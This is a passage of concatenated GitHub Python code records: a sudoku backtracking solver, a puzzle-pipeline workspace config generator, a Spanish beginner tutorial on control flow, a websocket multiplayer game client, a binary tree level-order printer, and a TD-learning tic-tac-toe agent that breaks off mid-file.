self.tamano + 1): \n if self.is_valid(row, col, num):\n self.sudoku[row][col] = num\n if self.solve(): \n return True\n self.sudoku[row][col] = 0 # Deshacer la asignación si no lleva a una solución plausible\n\n return False\n\n def find_empty(self):\n for i in range(self.tamano):\n for j in range(self.tamano):\n if self.sudoku[i][j] == 0:\n return (i, j) \n return None\n\n def print_solution(self):\n for row in self.sudoku:\n print(row)\n\nsudoku_board = [\n [0, 0, 5, 0, 0, 8, 3, 9, 0],\n [0, 3, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 7, 0, 0, 0, 8, 0],\n [0, 0, 4, 5, 0, 0, 6, 0, 2],\n [6, 1, 0, 0, 0, 0, 0, 0, 0],\n [2, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 2, 4, 0, 5],\n [0, 0, 9, 0, 8, 0, 0, 0, 0],\n [5, 6, 0, 0, 0, 0, 0, 0, 0],\n]\n\nsudoku_solver = backtraking(sudoku_board)\ntime1 = time.time()\n\nif sudoku_solver.solve():\n print(\"Solución encontrada:\")\n sudoku_solver.print_solution()\nelse:\n print(\"No hay solución.\")\nprint(time.time() - time1)","repo_name":"Seba-Quintana/sudoku","sub_path":"backtracking/sudoku_optimizado.py","file_name":"sudoku_optimizado.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42659378755","text":"import os\nfrom os.path import join, normpath\nfrom six.moves import configparser\nimport subprocess\n\nfrom . import util\nfrom . import condor\n\ndef setup_parser(subparsers):\n p = subparsers.add('config', help='Initialize a directory as workspace')\n p.add_argument('dir', help='Workspace directory')\n # p.add_argument('cfg', help='Config file')\n p.add_argument('condor', help='HTCondor submission file template')\n\n_CONFIG_TEMPLATE = \\\n'''\n# THE RUNNING ENVIRONMENT CONFIGURATION FILE OF PUZZLE SOLVER\n#\n# Design:\n# The whole pipeline is partitoned to run on three types of nodes:\n# 1. The local node, in which:\n# a) user should have root access so a rich set of packages can be installed\n# b) the processor should have relatively high frequency for single threaded tasks\n# c) A GPU with OpenGL and EGL support is mandatory\n# d) Ideally this node should have largest amount of memory installed\n# 2. A GPU node, where the TensorFlow based training/testing is done\n# a) Must support OpenGL and EGL as well.\n# + Note: if docker is used, the nvidia/cudagl image should be used instead of nvidia/cuda.\n# The latter one does not support OpenGL.\n# 3. The HTCondor submission node, where the massive parallel executions are offloaded\n# This node should also be capable of (or allowed for) running moderate workloads.\n# GPU is NOT required on this node.\n#\n# libosr.so and pyosr.so must be compiled on all three nodes. GPU support can\n# (and should) be disabled on HTCondor node.\n#\n# Local node should be able to ssh into GPU node and HTCondor submission node.\n# Other ssh access is not necessary.\n#\n# On all three types of nodes, the ExecPath is directory that stores facade.py,\n# and the WorkspacePath is the directory that store the workspace information.\n#\n# You only need to create workspace in the local node.\n# The workspaces on the other two nodes will be deployed automatically with autorun()\n#\n# Note: each type of node only stores necessary files for its compute task,\n# in order to save harddrive space.\n[DEFAULT]\n\n[SYSTEM]\n# Host name of GPU node, SSH host alias can be used\nGPUHost = {GPUHost}\n# facade.py path on GPU node\nGPUExecPath = {GPUExecPath}\n# Workspace path on GPU node\nGPUWorkspacePath = {GPUWorkspacePath}\n\n# Host name of HTCondor submission node, SSH host alias can be used\nCondorHost = {CondorHost}\n# Extra HTCondor submission nodes, comma separated\nExtraCondorHosts =\n# facade.py path on HTCondor node\nCondorExecPath = {CondorExecPath}\n# Workspace path on NTCondor node\nCondorWorkspacePath = {CondorWorkspacePath}\n\n# How many jobs are you authroized to run in parallel on HTCondor\n# This is a hint for tasks partitioning\nCondorQuota = 150\n\nChartReslution = 2048\n\n# the email address to send the notifications\n# Note only situations that require user interactions will be notified, e.g.:\n# A job is on hold on HTCondor.\nmailto = SHOULD_NOT_BE_HERE_AND_KEEP_IT_PRIVATE\n# Sometimes we do not have access to mail locally\nmailfrom_host = SHOULD_NOT_BE_HERE_AND_KEEP_IT_PRIVATE\n\n[TrainingTrajectory]\n# RDT algorithm. This is usually the best choice among classical algorithms\nPlannerAlgorithmID = 15\n# Time limit of each instance, unit: day(s)\nCondorTimeThreshold = 0.05\n# Number of instances to run on HTCondor in order to find the solution path\nCondorInstances = 100\n\n# In this section, we use numerical method to approximate the minimal clearance\n[TrainingKeyConf]\n# Limit the number of trajectories\nTrajectoryLimit = -1\n# Number of points on each solution trajectory as candidate key configurations\nCandidateNumber = 1024\n# How many samples do we create to estimate the clearance volume in C-space\nClearanceSample = 4096\n# HTCondor task granularity, tradeoff between minimizing overhead and\n# maximizing the parallelism\n# Default as 4 to prefer parallelism\nClearanceTaskGranularity = 4\n# How many configurations we pick from candidates as key configurations.\n# This varies among the training models\nKeyConf = 1\n\n[TrainingWeightChart]\n# How many touch configuration we shall generate for each key configuration\nTouchSample = 32768\n# Hint about the task partition\n# i.e. How many samples shall we generate in each worker process\n# Note: each worker process produces its own output file\nTouchSampleGranularity = 32768\n# Minimal task size hint: mesh boolean\nMeshBoolGranularity = 1024\n# Minimal task size hint: mesh boolean\n# UVProjectGranularity = 1024\n\n[TrainingCluster]\n# Format Group# = .piece1,.piece2\n# Example\n# Group0 = alpha.piece1,alpha.piece2\n# Group1 = duet.piece1\n# Group2 = duet.piece2\n\n[Prediction]\nEnable = yes\n# Set the number of processes that predict the key configuration from\n# the surface distribution, auto means number of (logic) processors\nNumberOfPredictionProcesses = auto\nNumberOfRotations = 256\nSurfacePairsToSample = 1024\nMargin = 1e-6\n# Reuse trained workspace so we can separate the training workspace from testing workspace\n# May use relative path\nReuseWorkspace = {ReuseWorkspace}\nOversamplingRatio = 10\nOversamplingClearanceSample = 128\n\n\n[GeometriK]\n\nFineMeshV = 500000\nKeyPointAttempts = 32\nKeyConfigRotations = 512\n\nEnableNotchDetection = yes\n\n[RoboGeoK]\nKeyPointAttempts = 32\nEnvKeyPoints = 1024\nKeyConfigRotations = 64\n\n[Solver]\nEnableKeyConfScreening = yes\n# Number of samples in the PreDefined Sample set\n# Not used\n# PDSSize = 4194304\nPDSBloom = 3072\n# Maximum trials before cancel\n# Not used\n# Trials = 1\n\n\n# In day(s), 0.01 ~= 14 minutes, 0.02 ~= 0.5 hour\nTimeThreshold = 0.02\n\n'''\n\ndef init_config_file(args, ws, oldws=None):\n print(f'calling init_config_file')\n interactive = (not hasattr(args, 'quiet') or not args.quiet)\n try:\n condor.extract_template(open(args.condor, 'r'), open(ws.condor_template, 'w'))\n cfg = ws.configuration_file\n print(f'config file {cfg}')\n if not os.path.isfile(cfg):\n if oldws is not None:\n old_config = configparser.ConfigParser()\n old_config.read_string(_CONFIG_TEMPLATE)\n old_dic = oldws.config_as_dict\n if 'SYSTEM' not in old_dic:\n \"\"\"\n Copy DEFAULT to SYSTEM\n This handles DEFAULT -> SYSTEM section renaming\n \"\"\"\n old_dic['SYSTEM'] = { k:v for k,v in oldws.config.items(\"DEFAULT\")}\n util.update_config_with_dict(old_config, old_dic)\n rel_old_to_new = os.path.relpath(ws.dir, start=oldws.dir)\n old_reuse = old_config.get('Prediction', 'ReuseWorkspace')\n gpu_ws = normpath(join(old_config.get('SYSTEM', 'GPUWorkspacePath'), rel_old_to_new))\n if old_reuse:\n new_reuse = os.path.relpath(join(oldws.dir, old_reuse), start=gpu_ws)\n else:\n new_reuse = ''\n dic = {\n 'GPUHost': old_config.get('SYSTEM', 'GPUHost'),\n 'GPUExecPath': old_config.get('SYSTEM', 'GPUExecPath'),\n 'GPUWorkspacePath': gpu_ws,\n 'CondorHost': old_config.get('SYSTEM', 'CondorHost'),\n 'CondorExecPath': old_config.get('SYSTEM', 'CondorExecPath'),\n 'CondorWorkspacePath': normpath(join(old_config.get('SYSTEM', 'CondorWorkspacePath'), rel_old_to_new)),\n 'ReuseWorkspace': new_reuse\n }\n if hasattr(args, 'override') and args.override is not None:\n patch = dict(item.split(\"=\") for item in args.override.split(\",\"))\n dic.update(patch)\n elif not interactive:\n pwd = str(os.getcwd())\n wspath = os.path.join(pwd, ws.dir)\n dic = {\n 'GPUHost': 'localhost',\n 'GPUExecPath': pwd,\n 'GPUWorkspacePath': wspath,\n 'CondorHost': 'localhost',\n 'CondorExecPath': pwd,\n 'CondorWorkspacePath': wspath,\n 'ReuseWorkspace': os.path.join(pwd, args.trained_workspace),\n }\n else:\n dic = {\n 'GPUHost': '',\n 'GPUExecPath': '',\n 'GPUWorkspacePath': '',\n 'CondorHost': '',\n 'CondorExecPath': '',\n 'CondorWorkspacePath': '',\n 'ReuseWorkspace': args.trained_workspace,\n }\n print(f'Creating config file at {cfg}')\n print(_CONFIG_TEMPLATE.format(**dic), file=open(cfg, 'w'))\n if interactive:\n EDITOR = os.environ.get('EDITOR', 'vim')\n subprocess.run([EDITOR, cfg])\n except FileNotFoundError as e:\n print(e)\n return\n # print('''The Puzzle Workspace is Ready! Use 'runall' to run the pipeline automatically.''')\n # print('''Use -h to list commands to run each pipeline stage independently.''')\n","repo_name":"xinyazhang/PuzzleTunnelDiscovery","sub_path":"src/GP/pipeline/envconfig.py","file_name":"envconfig.py","file_ext":"py","file_size_in_byte":9153,"program_lang":"python","lang":"en","doc_type":"code","stars":72,"dataset":"github-code","pt":"21"} +{"seq_id":"19544195309","text":"from Menu import Menu\r\nimport os\r\n\r\nclass Sentencias(Menu):\r\n\r\n def __init__(self):\r\n pass\r\n\r\n def menu_sentencias(self):\r\n opcion = self.menu([\"1) Ingreso de Datos\", \"2) If - Elif - Else\", \"3) Funciones\", \"4) Operadores Logicos\", \"5) Operador Ternario\", \"6) If - In\", \"7) Salir\"], \"*\" * 18 + \" MENU SENTENCIAS \" + \"*\" * 18)\r\n os.system(\"cls\")\r\n if opcion == '1':\r\n print(\"*\" * 17 + \" INGRESO DE DATOS \" + \"*\" * 17)\r\n nombre = input(\"Ingrese su nombre: \")\r\n edad = int(input(\"Ingrese su edad: \"))\r\n sueldo = float(input(\"Ingrese su sueldo: \"))\r\n print(\"Hola, \" + nombre)\r\n edadFutura = edad + 20\r\n print(\"Tu edad es: \", edad)\r\n print(\"Tu edad (dentro de 20 años) sera: {}\".format(edadFutura))\r\n print(\"Tu sueldo es: \", sueldo)\r\n\r\n input(\"\\nPresione una tecla para continuar...\"), os.system(\"cls\"), self.menu_sentencias()\r\n\r\n elif opcion == '2':\r\n print(\"*\" * 16 + \" IF - ELIF - ELSE \" + \"*\" * 16)\r\n print(\"¿Determinar si la persona es mayor de edad?\")\r\n\r\n edad = int(input(\"Ingrese su edad: \"))\r\n\r\n if edad > 18:\r\n print(\"Eres mayor de edad.\")\r\n elif edad == 18:\r\n print(\"Tienes 18 años\")\r\n else:\r\n print(\"No eres mayor de edad.\")\r\n\r\n input(\"\\nPresione una tecla para continuar...\"), os.system(\"cls\"), self.menu_sentencias()\r\n\r\n elif opcion == '3':\r\n print(\"*\" * 21 + \" FUNCIONES \" + \"*\" * 21)\r\n def saludar():\r\n print(\"Leonardo\")\r\n print(\"Arroba\")\r\n print(\"Zancorw\")\r\n return \"Hola\"\r\n print(saludar())\r\n\r\n def evalurSueldoMinimo(sueldo):\r\n if sueldo >= 425:\r\n print(\"Cumples con el sueldo\")\r\n else:\r\n print(\"Ganas menos que el sueldo minimo\")\r\n evalurSueldoMinimo(200)\r\n\r\n input(\"\\nPresione una tecla para continuar...\"), os.system(\"cls\"), self.menu_sentencias()\r\n\r\n elif opcion == '4':\r\n print(\"*\" * 18 + \" OPERADOR LOGICO \" + \"*\" * 17)\r\n distancia = 400\r\n nomeroHermanos = 3\r\n sueldoPadres = 3000\r\n tieneBeneficio = False\r\n\r\n if (distancia > 1000 and nomeroHermanos > 2) or sueldoPadres < 2000:\r\n tieneBeneficio = True\r\n print(not tieneBeneficio)\r\n\r\n if (7 > 4) and (6 < 12):\r\n print(\"Verdad\")\r\n else:\r\n print(\"Es mentira...\")\r\n\r\n input(\"\\nPresione una tecla para continuar...\"), os.system(\"cls\"), self.menu_sentencias()\r\n\r\n elif opcion == '5':\r\n print(\"*\" * 17 + \" OPERADOR TERNARIO \" + \"*\" * 17)\r\n \"\"\"\r\n String sexo;\r\n sexo = (10 > 20) ? \"Masculino\" : \"Femenino\"\r\n \"\"\"\r\n sexos = (\"Hombre\", \"Mujer\")\r\n posicion = True\r\n\r\n sexo = sexos[posicion] #Mujer\r\n print(sexo)\r\n\r\n sexo = sexos[not posicion] #Hombre\r\n print(sexo)\r\n\r\n input(\"\\nPresione una tecla para continuar...\"), os.system(\"cls\"), self.menu_sentencias()\r\n\r\n elif opcion == '6':\r\n print(\"*\" * 22 + \" IF - IN \" + \"*\" * 22)\r\n print(\"-- Cursos --\")\r\n print(\"Matematicas - Biologia - Lenguaje- Ciencias\")\r\n curso = input(\"Ingrese el curso deseado: \")\r\n if curso in (\"Matematicas\", \"Biologia\", \"Lenguaje\", \"Ciencias\"):\r\n print(\"Curso {} seleccionado\".format(curso))\r\n else:\r\n print(\"No existe curso...\")\r\n\r\n input(\"\\nPresione una tecla para continuar...\"), os.system(\"cls\"), self.menu_sentencias()\r\n\r\n elif opcion == '7':\r\n pass\r\n\r\n\r\n\r\n\r\n","repo_name":"LeonardoArroba/S9---Tarea-N-2","sub_path":"Curso/sentencias.py","file_name":"sentencias.py","file_ext":"py","file_size_in_byte":3905,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43650832141","text":"from ursina import *\r\nimport websocket, json\r\nfrom objects import Player, Bug\r\nfrom sys import exit\r\n\r\nws = websocket.WebSocketApp(\"wss://ws.korrumzthegame.wtf\")\r\n\r\nplayers = []\r\nbugs = []\r\n\r\ndef run_multiplayer(player_me, leaderboard, discord_rpc):\r\n global players, bugs\r\n\r\n def on_open(ws):\r\n data = {\r\n \"event\": \"new player\",\r\n \"data\": {\r\n \"username\": player_me.username,\r\n \"x\": player_me.x,\r\n \"y\": player_me.y,\r\n \"canvasWidth\": 5000,\r\n \"canvasHeight\": 5000,\r\n \"imageNumber\": player_me.image_number\r\n }\r\n }\r\n\r\n data = json.dumps(data)\r\n ws.send(data)\r\n\r\n def on_message(ws, msg):\r\n msg = json.loads(msg)\r\n data = msg[\"data\"]\r\n p = None\r\n\r\n for player in players + [player_me]:\r\n if \"username\" in data and player.username == data[\"username\"]:\r\n p = player\r\n\r\n if msg[\"event\"] == \"new player\":\r\n players.append(Player(data[\"username\"], data[\"x\"], data[\"y\"], data[\"pullRequests\"], data[\"imageNumber\"]))\r\n discord_rpc.update()\r\n\r\n elif msg[\"event\"] == \"new username\":\r\n player_me.username = data[\"username\"]\r\n discord_rpc.update()\r\n\r\n elif msg[\"event\"] == \"new image\":\r\n player_me.image_number = data[\"imageNumber\"]\r\n discord_rpc.update()\r\n\r\n elif msg[\"event\"] == \"move\":\r\n p.position = (data[\"x\"], 5, data[\"y\"])\r\n if not p == player_me:\r\n p.username_object.position = (data[\"x\"], 10, data[\"y\"])\r\n\r\n elif msg[\"event\"] == \"new bug\":\r\n bugs.append(Bug(data[\"x\"], data[\"y\"], data[\"imageNumber\"]))\r\n\r\n elif msg[\"event\"] == \"pull request\":\r\n b = None\r\n\r\n for bug in bugs:\r\n if (bug.position, bug.image_number) == (Vec3(data[\"bug\"][\"x\"], 2, data[\"bug\"][\"y\"]), data[\"bug\"][\"imageNumber\"]):\r\n b = bug\r\n \r\n bugs.remove(b)\r\n destroy(b)\r\n p.pull_requests = data[\"pullRequests\"]\r\n\r\n discord_rpc.update()\r\n\r\n elif msg[\"event\"] == \"new gban\":\r\n if data[\"username\"] == player_me.username:\r\n ws.close()\r\n player_me.running = False\r\n discord_rpc.running = False\r\n\r\n elif msg[\"event\"] == \"player disconnected\":\r\n players.remove(p)\r\n destroy(p.username_object)\r\n destroy(p)\r\n\r\n discord_rpc.update()\r\n\r\n leaderboard.text = \"Pull requesty:\\n\\n\" + \"\\n\".join([f\"{player.username if not player == player_me else player.username + ' (ty)'} {player.pull_requests}\" for player in sorted(players + [player_me], reverse=True, key=lambda player: player.pull_requests)])\r\n leaderboard.create_background()\r\n\r\n ws.on_open = on_open\r\n ws.on_message = on_message\r\n ws.run_forever()\r\n","repo_name":"PoligonTeam/korrumzthegame3d","sub_path":"korrumz the game 3d/multiplayer.py","file_name":"multiplayer.py","file_ext":"py","file_size_in_byte":2986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43023897970","text":"from sys import stdin, setrecursionlimit\nimport queue\n\nsetrecursionlimit(10 ** 6)\n\n\n#Following is the structure used to represent the Binary Tree Node\nclass BinaryTreeNode:\n def __init__(self, data):\n self.data = data\n self.left = None\n self.right = None\n\n\ndef printLevelWise(root):\n # Your code goes here\n q=queue.Queue()\n q.put(root)\n while q.empty() is False:\n currNode=q.get()\n if currNode.left is None and currNode.right is None:\n print(currNode.data,':','L',':','-1',',','R',':','-1',sep='')\n elif currNode.left is None:\n print(currNode.data,':','L',':','-1',',','R',':',currNode.right.data,sep='')\n q.put(currNode.right)\n elif currNode.right is None:\n print(currNode.data,':','L',':',currNode.left.data,',','R',':','-1',sep='')\n q.put(currNode.left)\n else:\n print(currNode.data,':','L',':',currNode.left.data,',','R',':',currNode.right.data,sep='')\n q.put(currNode.left)\n q.put(currNode.right)\n \n\n\n#Taking level-order input using fast I/O method\ndef takeInput():\n levelOrder = list(map(int, stdin.readline().strip().split(\" \")))\n start = 0\n \n length = len(levelOrder)\n\n if length == 1 :\n return None\n \n root = BinaryTreeNode(levelOrder[start])\n start += 1\n\n q = queue.Queue()\n q.put(root)\n\n while not q.empty():\n currentNode = q.get()\n\n leftChild = levelOrder[start]\n start += 1\n\n if leftChild != -1:\n leftNode = BinaryTreeNode(leftChild)\n currentNode.left =leftNode\n q.put(leftNode)\n\n rightChild = levelOrder[start]\n start += 1\n\n if rightChild != -1:\n rightNode = BinaryTreeNode(rightChild)\n currentNode.right =rightNode\n q.put(rightNode)\n\n return root\n\n\n# Main\nroot = takeInput()\nprintLevelWise(root)\n","repo_name":"ss4621-dev/Coding-Ninjas---Data-Structures-and-Algorithms-in-Python","sub_path":"Binary Trees - 2/Print Levelwise.py","file_name":"Print Levelwise.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"42743513887","text":"#!/usr/bin/env python\nimport os\nimport sys\nimport random\nimport time\nimport logging\nimport json\nfrom collections import defaultdict\nfrom itertools import product\nfrom multiprocessing import Pool\nfrom tempfile import NamedTemporaryFile\n\nimport pandas as pd\nimport click\nfrom tqdm import tqdm as _tqdm\ntqdm = _tqdm\n\nfrom gym_tictactoe.env import TicTacToeEnv, set_log_level_by, agent_by_mark,\\\n next_mark, check_game_status, after_action_state, O_REWARD, X_REWARD\nfrom human_agent import HumanAgent\nfrom base_agent import BaseAgent\n\n\nDEFAULT_VALUE = 0\nEPISODE_CNT = 17000\nBENCH_EPISODE_CNT = 3000\nMODEL_FILE = 'best_td_agent.dat'\nEPSILON = 0.08\nALPHA = 0.4\nCWD = os.path.dirname(os.path.abspath(__file__))\n\n\nst_values = {}\nst_visits = defaultdict(lambda: 0)\n\n\ndef reset_state_values():\n global st_values, st_visits\n st_values = {}\n st_visits = defaultdict(lambda: 0)\n\n\ndef set_state_value(state, value):\n st_visits[state] += 1\n st_values[state] = value\n\n\ndef best_val_indices(values, fn):\n best = fn(values)\n return [i for i, v in enumerate(values) if v == best]\n\n\nclass TDAgent(object):\n def __init__(self, mark, epsilon, alpha):\n self.mark = mark\n self.alpha = alpha\n self.epsilon = epsilon\n self.episode_rate = 1.0\n\n def act(self, state, ava_actions):\n return self.egreedy_policy(state, ava_actions)\n\n def egreedy_policy(self, state, ava_actions):\n \"\"\"Returns action by Epsilon greedy policy.\n\n Return random action with epsilon probability or best action.\n\n Args:\n state (tuple): Board status + mark\n ava_actions (list): Available actions\n\n Returns:\n int: Selected action.\n \"\"\"\n logging.debug(\"egreedy_policy for '{}'\".format(self.mark))\n e = random.random()\n if e < self.epsilon * self.episode_rate:\n logging.debug(\"Explore with eps {}\".format(self.epsilon))\n action = self.random_action(ava_actions)\n else:\n logging.debug(\"Exploit with eps {}\".format(self.epsilon))\n action = self.greedy_action(state, ava_actions)\n return action\n\n def random_action(self, ava_actions):\n return random.choice(ava_actions)\n\n def greedy_action(self, state, ava_actions):\n \"\"\"Return best action by current state value.\n\n Evaluate each action, select best one. Tie-breaking is random.\n\n Args:\n state (tuple): Board status + mark\n ava_actions (list): Available actions\n\n Returns:\n int: Selected action\n \"\"\"\n assert len(ava_actions) > 0\n\n ava_values = []\n for action in ava_actions:\n nstate = after_action_state(state, action)\n nval = self.ask_value(nstate)\n ava_values.append(nval)\n vcnt = st_visits[nstate]\n logging.debug(\" nstate {} val {:0.2f} visits {}\".\n format(nstate, nval, vcnt))\n\n # select most right action for 'O' or 'X'\n if self.mark == 'O':\n indices = best_val_indices(ava_values, max)\n else:\n indices = best_val_indices(ava_values, min)\n\n # tie breaking by random choice\n aidx = random.choice(indices)\n logging.debug(\"greedy_action mark {} ava_values {} indices {} aidx {}\".\n format(self.mark, ava_values, indices, aidx))\n\n action = ava_actions[aidx]\n\n return action\n\n def ask_value(self, state):\n \"\"\"Returns value of given state.\n\n If state is not exists, set it as default value.\n\n Args:\n state (tuple): State.\n\n Returns:\n float: Value of a state.\n \"\"\"\n if state not in st_values:\n logging.debug(\"ask_value - new state {}\".format(state))\n gstatus = check_game_status(state[0])\n val = DEFAULT_VALUE\n # win\n if gstatus > 0:\n val = O_REWARD if self.mark == 'O' else X_REWARD\n set_state_value(state, val)\n return st_values[state]\n\n def backup(self, state, nstate, reward):\n \"\"\"Backup value by difference and step size.\n\n Execute an action then backup Q by best value of next state.\n\n Args:\n state (tuple): Current state\n nstate (tuple): Next state\n reward (int): Immediate reward from action\n \"\"\"\n logging.debug(\"backup state {} nstate {} reward {}\".\n format(state, nstate, reward))\n\n val = self.ask_value(state)\n nval = self.ask_value(nstate)\n diff = nval - val\n val2 = val + self.alpha * diff\n\n logging.debug(\" value from {:0.2f} to {:0.2f}\".format(val, val2))\n set_state_value(state, val2)\n\n\n@click.group()\n@click.option('-v', '--verbose', count=True, help=\"Increase verbosity.\")\n@click.pass_context\ndef cli(ctx, verbose):\n global tqdm\n\n set_log_level_by(verbose)\n if verbose > 0:\n tqdm = lambda x: x # NOQA\n\n\n@cli.command(help=\"Learn and save the model.\")\n@click.option('-p', '--episode', \"max_episode\", default=EPISODE_CNT,\n show_default=True, help=\"Episode count.\")\n@click.option('-e', '--epsilon', \"epsilon\", default=EPSILON,\n show_default=True, help=\"Exploring factor.\")\n@click.option('-a', '--alpha', \"alpha\", default=ALPHA,\n show_default=True, help=\"Step size.\")\n@click.option('-f', '--save-file', default=MODEL_FILE, show_default=True,\n help=\"Save model data as file name.\")\ndef learn(max_episode, epsilon, alpha, save_file):\n _learn(max_episode, epsilon, alpha, save_file)\n\n\ndef _learn(max_episode, epsilon, alpha, save_file):\n \"\"\"Learn by episodes.\n\n Make two TD agent, and repeat self play for given episode count.\n Update state values as reward coming from the environment.\n\n Args:\n max_episode (int): Episode count.\n epsilon (float): Probability of exploration.\n alpha (float): Step size.\n save_file: File name to save result.\n \"\"\"\n reset_state_values()\n\n env = TicTacToeEnv()\n agents = [TDAgent('O', epsilon, alpha),\n TDAgent('X', epsilon, alpha)]\n\n start_mark = 'O'\n for i in tqdm(range(max_episode)):\n episode = i + 1\n env.show_episode(False, episode)\n\n # reset agent for new episode\n for agent in agents:\n agent.episode_rate = episode / float(max_episode)\n\n env.set_start_mark(start_mark)\n state = env.reset()\n _, mark = state\n done = False\n while not done:\n agent = agent_by_mark(agents, mark)\n ava_actions = env.available_actions()\n env.show_turn(False, mark)\n action = agent.act(state, ava_actions)\n\n # update (no rendering)\n nstate, reward, done, info = env.step(action)\n agent.backup(state, nstate, reward)\n\n if done:\n env.show_result(False, mark, reward)\n # set terminal state value\n set_state_value(state, reward)\n\n _, mark = state = nstate\n\n # rotate start\n start_mark = next_mark(start_mark)\n\n # save states\n save_model(save_file, max_episode, epsilon, alpha)\n\n\ndef save_model(save_file, max_episode, epsilon, alpha):\n with open(save_file, 'wt') as f:\n # write model info\n info = dict(type=\"td\", max_episode=max_episode, epsilon=epsilon,\n alpha=alpha)\n # write state values\n f.write('{}\\n'.format(json.dumps(info)))\n for state, value in st_values.items():\n vcnt = st_visits[state]\n f.write('{}\\t{:0.3f}\\t{}\\n'.format(state, value, vcnt))\n\n\ndef load_model(filename):\n with open(filename, 'rb') as f:\n # read model info\n info = json.loads(f.readline().decode('ascii'))\n for line in f:\n elms = line.decode('ascii').split('\\t')\n state = eval(elms[0])\n val = eval(elms[1])\n vcnt = eval(elms[2])\n st_values[state] = val\n st_visits[state] = vcnt\n return info\n\n\n@cli.command(help=\"Play with human.\")\n@click.option('-f', '--load-file', default=MODEL_FILE, show_default=True,\n help=\"Load file name.\")\n@click.option('-n', '--show-number', is_flag=True, default=False,\n show_default=True, help=\"Show location number when play.\")\ndef play(load_file, show_number):\n _play(load_file, HumanAgent('O'), show_number)\n\n\ndef _play(load_file, vs_agent, show_number):\n \"\"\"Play with learned model.\n\n Make TD agent and adversarial agnet to play with.\n Play and switch starting mark when the game finished.\n TD agent behave no exploring action while in play mode.\n\n Args:\n load_file (str):\n vs_agent (object): Enemy agent of TD agent.\n show_number (bool): Whether show grid number for visual hint.\n \"\"\"\n load_model(load_file)\n env = TicTacToeEnv(show_number=show_number)\n td_agent = TDAgent('X', 0, 0) # prevent exploring\n start_mark = 'O'\n agents = [vs_agent, td_agent]\n\n while True:\n # start agent rotation\n env.set_start_mark(start_mark)\n state = env.reset()\n _, mark = state\n done = False\n\n # show start board for human agent\n if mark == 'O':\n env.render(mode='human')\n\n while not done:\n agent = agent_by_mark(agents, mark)\n human = isinstance(agent, HumanAgent)\n\n env.show_turn(True, mark)\n ava_actions = env.available_actions()\n if human:\n action = agent.act(ava_actions)\n if action is None:\n sys.exit()\n else:\n action = agent.act(state, ava_actions)\n\n state, reward, done, info = env.step(action)\n\n env.render(mode='human')\n if done:\n env.show_result(True, mark, reward)\n break\n else:\n _, mark = state\n\n # rotation start\n start_mark = next_mark(start_mark)\n\n\n@cli.command(help=\"Learn and benchmark.\")\n@click.option('-p', '--learn-episode', \"max_episode\", default=EPISODE_CNT,\n show_default=True, help=\"Learn episode count.\")\n@click.option('-b', '--bench-episode', \"max_bench_episode\",\n default=BENCH_EPISODE_CNT, show_default=True, help=\"Bench \"\n \"episode count.\")\n@click.option('-e', '--epsilon', \"epsilon\", default=EPSILON,\n show_default=True, help=\"Exploring factor.\")\n@click.option('-a', '--alpha', \"alpha\", default=ALPHA,\n show_default=True, help=\"Step size.\")\n@click.option('-f', '--model-file', default=MODEL_FILE, show_default=True,\n help=\"Model data file name.\")\ndef learnbench(max_episode, max_bench_episode, epsilon, alpha, model_file):\n _learnbench(max_episode, max_bench_episode, epsilon, alpha, model_file)\n\n\ndef _learnbench(max_episode, max_bench_episode, epsilon, alpha, model_file,\n show=True):\n if show:\n print(\"Learning...\")\n _learn(max_episode, epsilon, alpha, model_file)\n if show:\n print(\"Benchmarking...\")\n return _bench(max_bench_episode, model_file, show)\n\n\n@cli.command(help=\"Benchmark agent with base agent.\")\n@click.option('-p', '--episode', \"max_episode\", default=BENCH_EPISODE_CNT,\n show_default=True, help=\"Episode count.\")\n@click.option('-f', '--model-file', default=MODEL_FILE, show_default=True,\n help=\"Model data file name.\")\ndef bench(model_file, max_episode):\n _bench(max_episode, model_file)\n\n\ndef _bench(max_episode, model_file, show_result=True):\n \"\"\"Benchmark given model.\n\n Args:\n max_episode (int): Episode count to benchmark.\n model_file (str): Learned model file name to benchmark.\n show_result (bool): Output result to stdout.\n\n Returns:\n (dict): Benchmark result.\n \"\"\"\n minfo = load_model(model_file)\n agents = [BaseAgent('O'), TDAgent('X', 0, 0)]\n show = False\n\n start_mark = 'O'\n env = TicTacToeEnv()\n env.set_start_mark(start_mark)\n\n episode = 0\n results = []\n for i in tqdm(range(max_episode)):\n env.set_start_mark(start_mark)\n state = env.reset()\n _, mark = state\n done = False\n while not done:\n agent = agent_by_mark(agents, mark)\n ava_actions = env.available_actions()\n action = agent.act(state, ava_actions)\n state, reward, done, info = env.step(action)\n if show:\n env.show_turn(True, mark)\n env.render(mode='human')\n\n if done:\n if show:\n env.show_result(True, mark, reward)\n results.append(reward)\n break\n else:\n _, mark = state\n\n # rotation start\n start_mark = next_mark(start_mark)\n episode += 1\n\n o_win = results.count(1)\n x_win = results.count(-1)\n draw = len(results) - o_win - x_win\n mfile = model_file.replace(CWD + os.sep, '')\n minfo.update(dict(base_win=o_win, td_win=x_win, draw=draw,\n model_file=mfile))\n result = json.dumps(minfo)\n\n if show_result:\n print(result)\n return result\n\n\n@cli.command(help=\"Learn and play with human.\")\n@click.option('-p', '--episode', \"max_episode\", default=EPISODE_CNT,\n show_default=True, help=\"Episode count.\")\n@click.option('-e', '--epsilon', \"epsilon\", default=EPSILON,\n show_default=True, help=\"Exploring factor.\")\n@click.option('-a', '--alpha', \"alpha\", default=ALPHA,\n show_default=True, help=\"Step size.\")\n@click.option('-f', '--model-file', default=MODEL_FILE, show_default=True,\n help=\"Model file name.\")\n@click.option('-n', '--show-number', is_flag=True, default=False,\n show_default=True, help=\"Show location number when play.\")\ndef learnplay(max_episode, epsilon, alpha, model_file, show_number):\n _learn(max_episode, epsilon, alpha, model_file)\n _play(model_file, HumanAgent('O'), show_number)\n\n\n@cli.command(help=\"Grid search hyper-parameters.\")\n@click.option('-q', '--quality', type=click.Choice(['high', 'mid', 'low']),\n default='mid', show_default=True, help=\"Grid search\"\n \" 